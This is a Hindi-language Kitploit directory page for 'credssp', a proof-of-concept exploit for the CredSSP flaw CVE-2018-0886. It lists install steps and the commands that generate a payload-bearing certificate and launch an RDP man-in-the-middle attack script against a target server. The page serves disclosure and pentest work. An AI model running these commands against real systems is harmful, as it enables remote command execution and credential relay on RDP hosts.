Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
credssp — CVE-2018-0886 को प्रदर्शित करने वाला एक कोड | Kitploit
उपकरण/GitHubGitHub/preempt/credssp
भेद्यता विश्लेषणशोषणपार्श्व आंदोलनपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षारेड टीमिंग
GitHubpreempt/credssp

credssp

CVE-2018-0886 को प्रदर्शित करने वाला एक कोड

रिपॉजिटरी देखें
267576 साल पहलेKitploit द्वारा समीक्षित

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

credssp

यह CVE-2018-0886 का शोषण करने के लिए एक poc कोड है। इसका उपयोग केवल शैक्षिक उद्देश्यों के लिए किया जाना चाहिए। यह rdpy प्रोजेक्ट (https://github.com/preempt/rdpy) के एक fork पर निर्भर करता है, जो credssp relay की भी अनुमति देता है।

Eyal Karni, Preempt द्वारा लिखित [email protected]

बिल्ड

निर्देश (Linux)

यदि आप Ubuntu 14 का उपयोग कर रहे हैं, तो install फ़ाइल देखें.. इसका परीक्षण Ubuntu 16.04 पर किया गया था।

root@kitploit:~
$ git clone https://github.com/preempt/rdpy.git rdpy
$ git clone https://github.com/preempt/credssp.git 
$ cd credssp/install
$ sh install.sh
$ cd ../../rdpy
$ sudo python setup.py install
  • यह काफी साफ-सुथरी प्रारंभिक अवस्था मानता है। सबसे पहले प्रासंगिक घटकों जैसे cryptography, pyopenssl को अनइंस्टॉल करना सबसे अच्छा है (pip uninstall cryptography)।
  • इसे सफलतापूर्वक चलाने के लिए openssl का एक अलग संस्करण स्थापित करना आवश्यक है। install स्क्रिप्ट ऐसा करती है।
  • कृपया निर्देशों का वर्णित क्रम में पालन करें।

एक्सप्लॉइट चलाना

किसी भी डोमेन से Server Authentication के लिए उपयुक्त प्रमाणपत्र निर्यात करें। (इसका उपयोग RDP के लिए किया जाता है https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/dn781533(v=ws.11))

भेद्यता का शोषण करने वाला (पेलोड युक्त) प्रमाणपत्र उत्पन्न करने के लिए, उपयोग करें:

root@kitploit:~
$ python credssp/bin/gen_cmd.py -c ExportedCert -o exploitc.pem -k exploitk.pem CMD 

(ExportedCert चरण 1 से निर्यात किया गया प्रमाणपत्र है। exploitc.pem ,exploitk.pem क्रमशः उत्पन्न प्रमाणपत्र और निजी कुंजी हैं।)

हमला स्क्रिप्ट चलाने के लिए:

root@kitploit:~
$ python /usr/local/bin/rdpy-rdpcredsspmitm.py -k exploitk.pem -c exploitc.pem TargetServer

अधिक विवरण स्क्रिप्ट के उपयोग अनुभाग में दिए गए हैं(--help)।

टूल डाउनलोड करें